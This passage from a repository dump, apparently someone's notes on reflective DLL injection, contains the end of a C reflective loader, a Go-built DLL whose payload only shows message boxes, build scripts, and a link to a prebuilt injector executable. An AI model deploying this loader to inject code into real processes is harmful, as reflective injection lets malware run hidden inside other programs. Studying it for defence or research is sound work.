549 | 	uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
550 | 
551 | 	// uiValueB = the address of the relocation directory
552 | 	uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
553 | 
554 | 	// check if their are any relocations present
555 | 	if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
556 | 	{
557 | 		// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
558 | 		uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
559 | 
560 | 		// and we itterate through all entries...
561 | 		while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
562 | 		{
563 | 			// uiValueA = the VA for this relocation block
564 | 			uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress );
565 | 
566 | 			// uiValueB = number of entries in this relocation block
567 | 			uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC );
568 | 
569 | 			// uiValueD is now the first entry in the current relocation block
570 | 			uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
571 | 
572 | 			// we itterate through all the entries in the current block...
573 | 			while( uiValueB-- )
574 | 			{
575 | 				// perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
576 | 				// we dont use a switch statement to avoid the compiler building a jump table
577 | 				// which would not be very position independent!
578 | 				if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 )
579 | 					*(ULONG_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
580 | 				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW )
581 | 					*(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
582 | 
583 | 				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH )
584 | 					*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
585 | 				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW )
586 | 					*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
587 | 
588 | 				// get the next entry in the current relocation block
589 | 				uiValueD += sizeof( IMAGE_RELOC );
590 | 			}
591 | 
592 | 			// get the next entry in the relocation directory
593 | 			uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
594 | 		}
595 | 	}
596 | 
597 | 	// STEP 6: call our images entry point
598 | 
599 | 	// uiValueA = the VA of our newly loaded DLL/EXE's entry point
600 | 	uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint );
601 | 
602 | 	// We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing.
603 | 	pNtFlushInstructionCache( (HANDLE)-1, NULL, 0 );
604 | 
605 | 	// call our respective entry point, fudging our hInstance value
606 | 
607 | 	// if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
608 | 	((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter );
609 | 
610 | 
611 | 	// STEP 8: return our new entry point address so whatever called us can call DllMain() if needed.
612 | 	return uiValueA;
613 | }
614 | //===============================================================================================//
615 | #endif
616 | //===============================================================================================//
617 | 


--------------------------------------------------------------------------------
/go-ReflectiveDLL-master/x32/dllmain.c:
--------------------------------------------------------------------------------
 1 | #include "dllmain.h"
 2 | #include"ReflectiveDll.h"
 3 | 
 4 | DWORD WINAPI MyThreadFunction() {
 5 |     OnProcessAttach();
 6 |     test();
 7 |     return 0;
 8 | }
 9 | 
10 | BOOL WINAPI DllMain(
11 |     HINSTANCE _hinstDLL,  // handle to DLL module
12 |     DWORD _fdwReason,     // reason for calling function
13 |     LPVOID _lpReserved)   // reserved
14 | {
15 |     switch (_fdwReason) {
16 | 	case DLL_PROCESS_ATTACH:
17 |         {
18 |         MyThreadFunction();
19 | 
20 |         }
21 |         break;
22 |     case DLL_PROCESS_DETACH:
23 |         // Perform any necessary cleanup.
24 |         break;
25 |     case DLL_THREAD_DETACH:
26 |         // Do thread-specific cleanup.
27 |         break;
28 |     case DLL_THREAD_ATTACH:
29 | 		// Do thread-specific initialization.
30 |         break;
31 |     }
32 |     return TRUE; // Successful.
33 | }


--------------------------------------------------------------------------------
/go-ReflectiveDLL-master/x32/dllmain.def:
--------------------------------------------------------------------------------
1 | EXPORTS
2 |     MyThreadFunction
3 |     OnProcessAttach
4 |     ReflectiveLoader


--------------------------------------------------------------------------------
/go-ReflectiveDLL-master/x32/dllmain.go:
--------------------------------------------------------------------------------
1 | package main
2 | 
3 | //#include "dllmain.h"
4 | import "C"
5 | 


--------------------------------------------------------------------------------
/go-ReflectiveDLL-master/x32/dllmain.h:
--------------------------------------------------------------------------------
 1 | /* Code generated by cmd/cgo; DO NOT EDIT. */
 2 | 
 3 | /* package _/H_/Engineering/Go_Project/ReflectiveDLL/x32 */
 4 | 
 5 | 
 6 | #line 1 "cgo-builtin-export-prolog"
 7 | 
 8 | #include <stddef.h> /* for ptrdiff_t below */
 9 | 
10 | #ifndef GO_CGO_EXPORT_PROLOGUE_H
11 | #define GO_CGO_EXPORT_PROLOGUE_H
12 | 
13 | #ifndef GO_CGO_GOSTRING_TYPEDEF
14 | typedef struct { const char *p; ptrdiff_t n; } _GoString_;
15 | #endif
16 | 
17 | #endif
18 | 
19 | /* Start of preamble from import "C" comments.  */
20 | 
21 | 
22 | 
23 | 
24 | /* End of preamble from import "C" comments.  */
25 | 
26 | 
27 | /* Start of boilerplate cgo prologue.  */
28 | #line 1 "cgo-gcc-export-header-prolog"
29 | 
30 | #ifndef GO_CGO_PROLOGUE_H
31 | #define GO_CGO_PROLOGUE_H
32 | 
33 | typedef signed char GoInt8;
34 | typedef unsigned char GoUint8;
35 | typedef short GoInt16;
36 | typedef unsigned short GoUint16;
37 | typedef int GoInt32;
38 | typedef unsigned int GoUint32;
39 | typedef long long GoInt64;
40 | typedef unsigned long long GoUint64;
41 | typedef GoInt32 GoInt;
42 | typedef GoUint32 GoUint;
43 | typedef __SIZE_TYPE__ GoUintptr;
44 | typedef float GoFloat32;
45 | typedef double GoFloat64;
46 | typedef float _Complex GoComplex64;
47 | typedef double _Complex GoComplex128;
48 | 
49 | /*
50 |   static assertion to make sure the file is being used on architecture
51 |   at least with matching size of GoInt.
52 | */
53 | typedef char _check_for_32_bit_pointer_matching_GoInt[sizeof(void*)==32/8 ? 1:-1];
54 | 
55 | #ifndef GO_CGO_GOSTRING_TYPEDEF
56 | typedef _GoString_ GoString;
57 | #endif
58 | typedef void *GoMap;
59 | typedef void *GoChan;
60 | typedef struct { void *t; void *v; } GoInterface;
61 | typedef struct { void *data; GoInt len; GoInt cap; } GoSlice;
62 | 
63 | #endif
64 | 
65 | /* End of boilerplate cgo prologue.  */
66 | 
67 | #ifdef __cplusplus
68 | extern "C" {
69 | #endif
70 | 
71 | 
72 | extern void OnProcessAttach();
73 | 
74 | extern void test();
75 | 
76 | #ifdef __cplusplus
77 | }
78 | #endif
79 | 


--------------------------------------------------------------------------------
/go-ReflectiveDLL-master/x32/inject.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/go-ReflectiveDLL-master/x32/inject.exe


--------------------------------------------------------------------------------
/go-ReflectiveDLL-master/x32/main.go:
--------------------------------------------------------------------------------
 1 | package main
 2 | 
 3 | import "C"
 4 | 
 5 | import (
 6 | 	"syscall"
 7 | 	"unsafe"
 8 | )
 9 | 
10 | 
11 | func IntPtr(n int) uintptr {
12 | 	return uintptr(n)
13 | }
14 | func StrPtr(s string) uintptr {
15 | 	return uintptr(unsafe.Pointer(syscall.StringToUTF16Ptr(s)))
16 | }
17 | func MessageBox(title, text string) {
18 | 	user32 := syscall.NewLazyDLL("user32.dll")
19 | 	MessageBoxW := user32.NewProc("MessageBoxW")
20 | 	MessageBoxW.Call(IntPtr(0), StrPtr(text), StrPtr(title), IntPtr(0))
21 | }
22 | 
23 | //export OnProcessAttach
24 | func OnProcessAttach() {
25 | 	MessageBox("OnProcessAttach","OnProcessAttach")
26 | }
27 | //export test
28 | func test() {
29 | 	MessageBox("test","test")
30 | }
31 | 
32 | func main()  {
33 | 
34 | }
35 | 


--------------------------------------------------------------------------------
/go-ReflectiveDLL-master/x32/x32.bat:
--------------------------------------------------------------------------------
1 | set GOARCH=386
2 | set CGO_ENABLED=1
3 | go build --ldflags "-s -w" -buildmode=c-archive -o dllmain.a
4 | set path=D:\mingw32\bin\;%path%
5 | gcc dllmain.def dllmain.a -shared -lwinmm -lWs2_32 -o dllmain.dll
6 | move dllmain.dll reflective_dll.dll 


--------------------------------------------------------------------------------
/go-ReflectiveDLL-master/x64.bat:
--------------------------------------------------------------------------------
1 | del dllmain.a
2 | go build -a -v --ldflags "-s -w" -buildmode=c-archive -o dllmain.a
3 | gcc dllmain.def dllmain.a -shared -lwinmm -lWs2_32 -o dllmain.dll
4 | move dllmain.dll reflective_dll.x64.dll
5 | 


--------------------------------------------------------------------------------